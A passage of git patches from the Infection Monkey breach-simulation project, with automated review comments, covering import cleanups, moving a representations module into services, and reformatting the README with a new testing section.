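Review bot: The new-side `Event.create_event(title="sdf", message="asd", event_type=zero_trust_consts.EVENT_TYPE_MONKEY_NETWORK)` keeps keyboard-mash placeholders for the event text; since the call is being rewritten anyway, `title="Segmentation violation", message="test event"` costs nothing and keeps the fixture self-describing. The four `len(Finding.objects(test=zero_trust_consts.TEST_SEGMENTATION, ...))` counts could also go through a small helper on the test class so the long query line appears once. The test method's `def` line is above this hunk.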
@@ -1,4 +1,4 @@ -from common.data.zero_trust_consts import TEST_TUNNELING, STATUS_FAILED, EVENT_TYPE_MONKEY_NETWORK +import common.data.zero_trust_consts as zero_trust_consts from monkey_island.cc.models import Monkey from monkey_island.cc.models.zero_trust.aggregate_finding import AggregateFinding, add_malicious_activity_to_timeline from monkey_island.cc.models.zero_trust.event import Event @@ -14,13 +14,13 @@ def test_tunneling_violation(tunnel_telemetry_json): title="Tunneling event", message="Monkey on {hostname} tunneled traffic through {proxy}.".format( hostname=current_monkey.hostname, proxy=tunnel_host_ip), - event_type=EVENT_TYPE_MONKEY_NETWORK, + event_type=zero_trust_consts.EVENT_TYPE_MONKEY_NETWORK, timestamp=tunnel_telemetry_json['timestamp'] )] AggregateFinding.create_or_add_to_existing( - test=TEST_TUNNELING, - status=STATUS_FAILED, + test=zero_trust_consts.TEST_TUNNELING, + status=zero_trust_consts.STATUS_FAILED, events=tunneling_events ) From bcf2d964d767a9c383fcf499aaad2cb8e8b940f2 Mon Sep 17 00:00:00 2001 From: Shay Nehmad Date: Mon, 4 Nov 2019 11:44:25 +0200 Subject: [PATCH 43/44] Moved representations to services --- monkey/monkey_island/cc/app.py | 8 ++++---- .../cc/{resources => services}/representations.py | 0 .../cc/{resources => services}/representations_test.py | 2 +- 3 files changed, 5 insertions(+), 5 deletions(-) rename monkey/monkey_island/cc/{resources => services}/representations.py (100%) rename monkey/monkey_island/cc/{resources => services}/representations_test.py (95%) diff --git a/monkey/monkey_island/cc/app.py b/monkey/monkey_island/cc/app.py index 9b5e7b849..be2430dda 100644 --- a/monkey/monkey_island/cc/app.py +++ b/monkey/monkey_island/cc/app.py 
@@ -21,18 +21,18 @@ from monkey_island.cc.resources.netmap import NetMap from monkey_island.cc.resources.node import Node from monkey_island.cc.resources.remote_run import RemoteRun from monkey_island.cc.resources.reporting.report import Report -from monkey_island.cc.resources.representations import output_json from monkey_island.cc.resources.root import Root from monkey_island.cc.resources.telemetry import Telemetry from monkey_island.cc.resources.telemetry_feed import TelemetryFeed from monkey_island.cc.resources.pba_file_download import PBAFileDownload from monkey_island.cc.resources.version_update import VersionUpdate -from monkey_island.cc.services.database import Database -from monkey_island.cc.consts import MONKEY_ISLAND_ABS_PATH -from monkey_island.cc.services.remote_run_aws import RemoteRunAwsService from monkey_island.cc.resources.pba_file_upload import FileUpload from monkey_island.cc.resources.attack.attack_config import AttackConfiguration from monkey_island.cc.resources.attack.attack_report import AttackReport +from monkey_island.cc.services.database import Database +from monkey_island.cc.services.remote_run_aws import RemoteRunAwsService +from monkey_island.cc.services.representations import output_json +from monkey_island.cc.consts import MONKEY_ISLAND_ABS_PATH from monkey_island.cc.resources.test.monkey_test import MonkeyTest from monkey_island.cc.resources.test.log_test import LogTest diff --git a/monkey/monkey_island/cc/resources/representations.py b/monkey/monkey_island/cc/services/representations.py similarity index 100% rename from monkey/monkey_island/cc/resources/representations.py rename to monkey/monkey_island/cc/services/representations.py 
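Review bot: The regrouped import block in the `@@ -21,18` hunk brings `Database`, `RemoteRunAwsService` and `output_json` together under `services`, but leaves `from monkey_island.cc.consts import MONKEY_ISLAND_ABS_PATH` between them and the trailing `resources.test.*` imports, so the block is still neither grouped by package nor alphabetical. Since this commit is already reordering these lines, moving the `consts` import ahead of the `services` group (or running an import sorter over the file) would finish the job. Only the import section of `app.py` is visible in this hunk.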
diff --git a/monkey/monkey_island/cc/resources/representations_test.py b/monkey/monkey_island/cc/services/representations_test.py similarity index 95% rename from monkey/monkey_island/cc/resources/representations_test.py rename to monkey/monkey_island/cc/services/representations_test.py index c50394117..d6c7f99d7 100644 --- a/monkey/monkey_island/cc/resources/representations_test.py +++ b/monkey/monkey_island/cc/services/representations_test.py @@ -1,6 +1,6 @@ from unittest import TestCase from datetime import datetime -from .representations import normalize_obj +from monkey_island.cc.services.representations import normalize_obj import bson From c68ea48b0b8f08044753abc19858b387292472cd Mon Sep 17 00:00:00 2001 From: Shay Nehmad Date: Tue, 5 Nov 2019 10:19:39 +0200 Subject: [PATCH 44/44] Added unit tests guide to the readme. --- README.md | 26 +++++++++++++------------- 1 file changed, 13 insertions(+), 13 deletions(-) diff --git a/README.md b/README.md index 2d7490bfe..dd1d7982b 100644 --- a/README.md +++ b/README.md 
@@ -1,31 +1,27 @@ -Infection Monkey -==================== +# Infection Monkey [![Build Status](https://travis-ci.com/guardicore/monkey.svg?branch=develop)](https://travis-ci.com/guardicore/monkey) [![GitHub release (latest by date)](https://img.shields.io/github/v/release/guardicore/monkey)](https://github.com/guardicore/monkey/releases) ![GitHub stars](https://img.shields.io/github/stars/guardicore/monkey) ![GitHub commit activity](https://img.shields.io/github/commit-activity/m/guardicore/monkey) ## Data center Security Testing Tool ------------------------- Welcome to the Infection Monkey! The Infection Monkey is an open source security tool for testing a data center's resiliency to perimeter breaches and internal server infection. The Monkey uses various methods to self propagate across a data center and reports success to a centralized Monkey Island server. - + The Infection Monkey is comprised of two parts: * Monkey - A tool which infects other machines and propagates to them * Monkey Island - A dedicated server to control and visualize the Infection Monkey's progress inside the data center To read more about the Monkey, visit http://infectionmonkey.com -Main Features ---------------- - +## Main Features The Infection Monkey uses the following techniques and exploits to propagate to other machines. * Multiple propagation techniques: 
@@ -41,15 +37,13 @@ The Infection Monkey uses the following techniques and exploits to propagate to * SambaCry * Elastic Search (CVE-2015-1427) -Setup -------------------------------- +## Setup Check out the [Setup](https://github.com/guardicore/monkey/wiki/setup) page in the Wiki or a quick getting [started guide](https://www.guardicore.com/infectionmonkey/wt/). The Infection Monkey supports a variety of platforms, documented [in the wiki](https://github.com/guardicore/monkey/wiki/OS-compatibility). -Building the Monkey from source -------------------------------- +## Building the Monkey from source To deploy development version of monkey you should refer to readme in the [deployment scripts](deployment_scripts) folder. If you only want to build the monkey from source, see [Setup](https://github.com/guardicore/monkey/wiki/Setup#compile-it-yourself) and follow the instructions at the readme files under [infection_monkey](infection_monkey) and [monkey_island](monkey_island). @@ -61,8 +55,14 @@ and follow the instructions at the readme files under [infection_monkey](infecti | Develop | [![Build Status](https://travis-ci.com/guardicore/monkey.svg?branch=develop)](https://travis-ci.com/guardicore/monkey) | | Master | [![Build Status](https://travis-ci.com/guardicore/monkey.svg?branch=master)](https://travis-ci.com/guardicore/monkey) | -License -======= +## Tests +### Unit Tests +In order to run all of the Unit Tests, run the command `python -m pytest` in the `monkey` directory. + +### Blackbox tests +In order to run the Blackbox tests, refer to `envs/monkey_zoo/blackbox/README.md`. + +# License Copyright (c) Guardicore Ltd See the [LICENSE](LICENSE) file for license rights and limitations (GPLv3).